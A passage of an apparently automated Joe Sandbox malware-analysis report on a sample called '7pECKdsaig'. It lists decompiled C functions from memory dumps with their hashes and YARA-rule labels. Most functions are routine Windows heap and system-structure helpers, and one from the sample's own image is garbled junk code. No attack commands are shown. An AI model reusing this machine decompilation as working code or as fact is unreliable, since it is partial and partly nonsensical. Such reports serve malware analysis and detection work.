					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017592C6(_t11, _t14);
				}
				return _t11;
			}

0x01759295
0x01759299
0x0175929f
0x017592aa
0x017592ad
0x017592ae
0x017592af
0x017592b0
0x017592b4
0x017592bb
0x017592bb
0x017592c5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 6a5e8527b7c42203b9cd8589c59713d05dbfe9e354e20cb2232497b1adcd0358
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 62E02B32340541ABE7519E09CC84F03B75DDFD2724F004078FA001F242C6F5DD0887A0

Uniqueness

Uniqueness Score: -1.00%

Function 017E8B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E017E8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x180d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01737D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L0175B640(E01759AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}

0x017e8b67
0x017e8b6f
0x017e8b72
0x017e8b7d
0x017e8b8f
0x017e8b7f
0x017e8b88
0x017e8b88
0x017e8b9a
0x017e8b9b
0x017e8b9d
0x017e8bb5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddf5913497f214d191dfa09ee9ac57b00da66d309ced7935a99918a841e5eea6
Instruction ID: bb1b29d1c4ddf801cbb421eda9229103ccf9f78f2cb25ecc6e53d116d18a60f3
Opcode Fuzzy Hash: ddf5913497f214d191dfa09ee9ac57b00da66d309ced7935a99918a841e5eea6
Instruction Fuzzy Hash: 74F05EB0A14259ABDB14EBA8D90AA6EB7E4EB08300F440499AA059B291EA74D900C795

Uniqueness

Uniqueness Score: -1.00%

Function 0171F358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0171F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0174F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01734620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0171f35d
0x0171f361
0x0171f367
0x0171f372
0x0171f38c
0x0171f38c
0x0171f394

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: ea6656d8dae7b0165d48ac4d78323326fcaf7b15683d928e6442c1398b3e6885
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: C5E0D832A40118FBDB219ADD9D06F5AFFACDB54A60F000155FA04D7154D5609D00D2D0

Uniqueness

Uniqueness Score: -1.00%

Function 017A41E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E017A41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x17f08f0);
				_t5 = E0176D08C(__ebx, __edi, __esi);
				if( *0x18087ec == 0) {
					L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x18087ec == 0) {
						 *0x18087f0 = 0x18087ec;
						 *0x18087ec = 0x18087ec;
						 *0x18087e8 = 0x18087e4;
						 *0x18087e4 = 0x18087e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L017A4248();
				}
				return E0176D0D1(_t5);
			}

0x017a41e8
0x017a41ea
0x017a41ef
0x017a41fb
0x017a4206
0x017a420b
0x017a4216
0x017a421d
0x017a4222
0x017a422c
0x017a4231
0x017a4231
0x017a4236
0x017a423d
0x017a423d
0x017a4247

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95940b8b7c2a6a940b65a33fd0b57ebf12d1f3431b643c5f6116bb30409dd11
Instruction ID: 393822bf26f544b86f4fd84fdd0df43031efb09693f11a52fe816a1ea908ef1f
Opcode Fuzzy Hash: d95940b8b7c2a6a940b65a33fd0b57ebf12d1f3431b643c5f6116bb30409dd11
Instruction Fuzzy Hash: 22F0F278D607098FCBF3EBA9D908704B6A4F79B311F40422A91118628DC77446E5CF05

Uniqueness

Uniqueness Score: -1.00%

Function 017CD380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E017CD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0171E8B0(__ecx, _a4, 0xfff);
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x017cd38a
0x017cd39b
0x017cd3b1
0x00000000
0x017cd3b6
0x00000000

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 87f97f0826c2eced8d5ad9954fd57c0645e88de6adf1d6415094aa2b449cc6d3
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 88E0C231281209FBDB335E88CC00F69FB16DB50BA0F104039FE085A691CA719D91D6C4

Uniqueness

Uniqueness Score: -1.00%

Function 0174A185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0174A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x18067e4 >= 0xa) {
					if(_t5 < 0x1806800 || _t5 >= 0x1806900) {
						return L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01730010(0x18067e0, _t5);
				}
			}

0x0174a190
0x0174a1a6
0x0174a1c2
0x00000000
0x00000000
0x00000000
0x0174a192
0x0174a192
0x0174a19f
0x0174a19f

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382c016f2c8a3cfda63037656634ca79ee3c867ea25d75373df8abb3e9102f2a
Instruction ID: 78a2d59528e386badaff6e1a1efed846c8c7e28fefcd24e9ca02f4e103df72f7
Opcode Fuzzy Hash: 382c016f2c8a3cfda63037656634ca79ee3c867ea25d75373df8abb3e9102f2a
Instruction Fuzzy Hash: BED05B615A10085BE66F57109D58B25B666F7C5750F34450DF3078B9D6FB5089F8D108

Uniqueness

Uniqueness Score: -1.00%

Function 017953CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E017953CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0172EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x017953ca
0x017953ce
0x017953d9
0x017953de
0x017953e1
0x017953e1
0x017953e6
0x017953f3
0x00000000
0x017953f8
0x017953fb

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 2f1103436f134002dbda1a220d66df1731d6ef533e39120fb055fb380ca5d004
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: CDE08272A006849BDF13EB8CCA94F4EFBF9FB84B00F180018A4086B621CA24AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00A87B1A Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00A87B1A(void* __ebx, signed int __ecx) {
				void* _t5;
				void* _t13;

				asm("into");
				 *((intOrPtr*)(__ebx + 0x215881a0)) =  *((intOrPtr*)(__ebx + 0x215881a0)) + _t13;
				asm("bound edx, [esi-0x58]");
				 *(_t5 + 0x6482d7f9) =  *(_t5 + 0x6482d7f9) & __ecx;
				return 1;
			}

0x00a87b1a
0x00a87b1b
0x00a87b21
0x00a87b25
0x00a87b3a

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265e16fa52d44e05f6aad4580cc100f22d80145863e04c5120d032b76090b41d
Instruction ID: 4e0b6b7b539f010fa3c1ee15df0d61fd7574ab6b329fc7107c6726d7c346bfc8
Opcode Fuzzy Hash: 265e16fa52d44e05f6aad4580cc100f22d80145863e04c5120d032b76090b41d
Instruction Fuzzy Hash: 74C01233A1A2488FE3308D18E881674FBA5DB53225F1553DBD804A7555965688558288

Uniqueness

Uniqueness Score: -1.00%

Function 0172AAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0172AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0172aab6
0x0172aabb
0x0177a442
0x00000000
0x0177a448
0x0177a454
0x0177a454
0x0172aac1
0x0172aac1
0x0172aac6
0x0172aac6

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 419165708b8e17209d6500724f7cb6f482f682c54525953b1c7f2ff57e632a0f
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 61D0E935352990CFEA17CB1DC554B1577B5BB44B84FC50490E501CBB62E62DD945CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0179A537 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0179A537(intOrPtr _a4, intOrPtr _a8) {

				return L01738E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0179a553

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 8c15f360a2b648082346dcfbe6e352684d959728ce2e4746124adf8f1770a871
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: F4C08C33080248BBCB126F82CC00F06BF2AFBA8B60F008010FA080B571C632E970EB94

Uniqueness

Uniqueness Score: -1.00%

Function 0171DB40 Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0171DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01734620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0171db4d
0x0171db54
0x0171db5f
0x0171db56
0x0171db56
0x0171db5c
0x0171db5c

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: c357bfa4426c50d1318428b26ceb1305d4441fd2375e11304101a1696f7db7e0
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 23C08C30280A01EAEB361F28CD01B00BAA0BB50B01F4400A06302DA0F4DB78DC02EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0171AD30 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0171AD30(intOrPtr _a4) {

				return L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0171ad49

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 67cd231b926ea2b8cc998dfcc192a8bdfc19479349083dfc68019f2fb0f12732
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: E9C08C32080248BBC7126A45CD00F01BB29E7A0B60F000020B6040A6628932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 01733A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01733A1C(intOrPtr _a4) {
				void* _t5;

				return L01734620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x01733a35

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 382ec75915fc408f00311de3aaad8c8b9bc298a5abf2cd475d9eecf32be616be
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 5BC08C32080648FBC7126E41DC00F01BB29E7A0B60F000020B6040A5618532EC60E588

Uniqueness

Uniqueness Score: -1.00%

Function 01737D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01737D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x01737d56
0x01737d5b
0x01737d60
0x01737d5d
0x01737d5d
0x01737d5d

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: ad934e7a889138d4d6485a0ee43d7170377bbed749e001f5d936430f85e04615
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 06B092753119408FCE1ADF18C084B1573E4BB84A40B8400D0E400CBA22D329E8408900

Uniqueness

Uniqueness Score: -1.00%

Function 01742ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01742ACB() {
				void* _t5;

				return E0172EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01742adc

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 3b8f97781e3615b3d8dce454d6dca0c736cf0462ee2691cc0d975f07b90a386a
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 14B01233C10451CFCF02EF44C610F19B331FB00750F0544A0D00127930C628AC02CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01759560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03244b9c9b12713462ac366e22d5252774e651c45c1ec66234a6448a35d849bd
Instruction ID: cff0c60c5951eb523ff46974a90fa9e58ed70f8400d8a9fe7be2e7387acf7d47
Opcode Fuzzy Hash: 03244b9c9b12713462ac366e22d5252774e651c45c1ec66234a6448a35d849bd
Instruction Fuzzy Hash: 5B900265335004060155A59A460450B4449B7DA391391C025F5806590CCA6188657361

Uniqueness

Uniqueness Score: -1.00%

Function 01759950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf3da989283b93ce6540d00ee7f8a0e50da5f72b60c6b93de9072fe2d45bf40
Instruction ID: 4be44565fe26f3dd07ee24d53a9f33f0083749639b80bd7ef3a685c7dfd2477d
Opcode Fuzzy Hash: 0bf3da989283b93ce6540d00ee7f8a0e50da5f72b60c6b93de9072fe2d45bf40
Instruction Fuzzy Hash: 9D9002A131540807D150659A88046074009A7D4342F51C021A6454555ECE698C517175

Uniqueness

Uniqueness Score: -1.00%

Function 0175AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489c60f41222e4e357185b39531438253161adb4864b704872ab272a6ddb584e
Instruction ID: 5ab1e80275362c1b654c33a9ebfc4f263e4df1dc0cf5cdfbd43f6c30af489adc
Opcode Fuzzy Hash: 489c60f41222e4e357185b39531438253161adb4864b704872ab272a6ddb584e
Instruction Fuzzy Hash: C2900271B19004169150719A8814646800AB7E4781B55C021A4904554CCD948A5573E1

Uniqueness

Uniqueness Score: -1.00%

Function 01759520 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9120ca71ecd750bbc756eea8699b8c264ad43b171da812c78b878629bdc1c36
Instruction ID: 78538627bec46ebb797a69ac069d90fc35a545b5cfcf40d2c3fd5eb73c1fb1e2
Opcode Fuzzy Hash: b9120ca71ecd750bbc756eea8699b8c264ad43b171da812c78b878629bdc1c36
Instruction Fuzzy Hash: B99002E1315144964510A29AC404B0A8509A7E4241B51C026E5444560CC9658851B175

Uniqueness

Uniqueness Score: -1.00%

Function 017595F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a84fb8074763d6644e432044fd02bb3002dbc871010d222d9e52dc8938acc3
Instruction ID: b2fe9ade221d70b5ec3bbef4c75f41a775349cfc738622a84fed6cf76f4017b0
Opcode Fuzzy Hash: 93a84fb8074763d6644e432044fd02bb3002dbc871010d222d9e52dc8938acc3
Instruction Fuzzy Hash: BE90027131500C06D114619A88046864009A7D4341F51C021AA414655EDAA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 017599D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7dcedb9e4b55217dc71edd6d1e1f5fe8e0246e496ce1dea8ce9d5b98fde21ae
Instruction ID: da0db18f4c6da61895fc5b82a16c03633bc8ccf0274f12329e7f0e4cc4a0f456
Opcode Fuzzy Hash: b7dcedb9e4b55217dc71edd6d1e1f5fe8e0246e496ce1dea8ce9d5b98fde21ae
Instruction Fuzzy Hash: 2D9002A132500446D114619A84047064049A7E5241F51C022A6544554CC9698C617165

Uniqueness

Uniqueness Score: -1.00%

Function 0175B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 028933c428d3b08deb80f04120fd4e9913d84307fa6ae4dbd8a0b8aa316e7f59
Instruction ID: 168ae11cd07ecfe47095b8fac62ff8b662b236b84cc9a44508a480de83821e38
Opcode Fuzzy Hash: 028933c428d3b08deb80f04120fd4e9913d84307fa6ae4dbd8a0b8aa316e7f59
Instruction Fuzzy Hash: 809002A1715144474550B19A88044069019B7E5341391C131A4844560CCAA88855B2A5

Uniqueness

Uniqueness Score: -1.00%

Function 01759820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ec4a35c5b15eeb65f56a05ff4095d6f6858e3f85da67b320ecd4dfd334febe3
Instruction ID: 4fcdea94197cc37a87d8d4e80d78f0eec19d5811fd2a4640a4694696d0a7764a
Opcode Fuzzy Hash: 6ec4a35c5b15eeb65f56a05ff4095d6f6858e3f85da67b320ecd4dfd334febe3
Instruction Fuzzy Hash: 6E90027135500806D151719A8404606400DB7D4281F91C022A4814554ECA958A56BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 017598A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fd22b05a1ff4fa605ef95990094dd8e4a0551934a65fc37e0bf9095b840dd19
Instruction ID: 64397e46b381996a23848260c35db058f15961d4dd476b14c621f8a8bbdf5c25
Opcode Fuzzy Hash: 2fd22b05a1ff4fa605ef95990094dd8e4a0551934a65fc37e0bf9095b840dd19
Instruction Fuzzy Hash: B490026131500806D112619A8414606400DE7D5385F91C022E5814555DCA658953B172

Uniqueness

Uniqueness Score: -1.00%

Function 01759B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d042e1e6b608919df90f89603c621d8670f51293b45194f6435f7ee0f80805
Instruction ID: 64d6157fa327ae3e2003793b76221c364a5cd3ec094cbb7deb96cc329f08403c
Opcode Fuzzy Hash: 09d042e1e6b608919df90f89603c621d8670f51293b45194f6435f7ee0f80805
Instruction Fuzzy Hash: CE90026135500C06D150719AC414707400AE7D4641F51C021A4414554DCA56896576F1

Uniqueness

Uniqueness Score: -1.00%

Function 0175A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5196876b964bb6ceec2ad1e17d923ebc2f5ca470752d02c2ab18d6a34c369a2
Instruction ID: e96ffe9b9ef8e7718f6d1f1c1cd0f004d2bd48fe16073484a22204b30bc4387c
Opcode Fuzzy Hash: a5196876b964bb6ceec2ad1e17d923ebc2f5ca470752d02c2ab18d6a34c369a2
Instruction Fuzzy Hash: 3190027131544406D150719AC44460B9009B7E4341F51C421E4815554CCA558856B261

Uniqueness

Uniqueness Score: -1.00%

Function 01759A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4d09348911f2085d96212a362e2fe13a099d06d46d53c080cf5462b6e43a0d
Instruction ID: c909cba34aea9bff7e7dbcc4055170a2709505c736484c1437abb7f7f08d5734
Opcode Fuzzy Hash: db4d09348911f2085d96212a362e2fe13a099d06d46d53c080cf5462b6e43a0d
Instruction Fuzzy Hash: B390027131540806D110619A88087474009A7D4342F51C021A9554555ECAA5C8917571

Uniqueness

Uniqueness Score: -1.00%

Function 01759A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

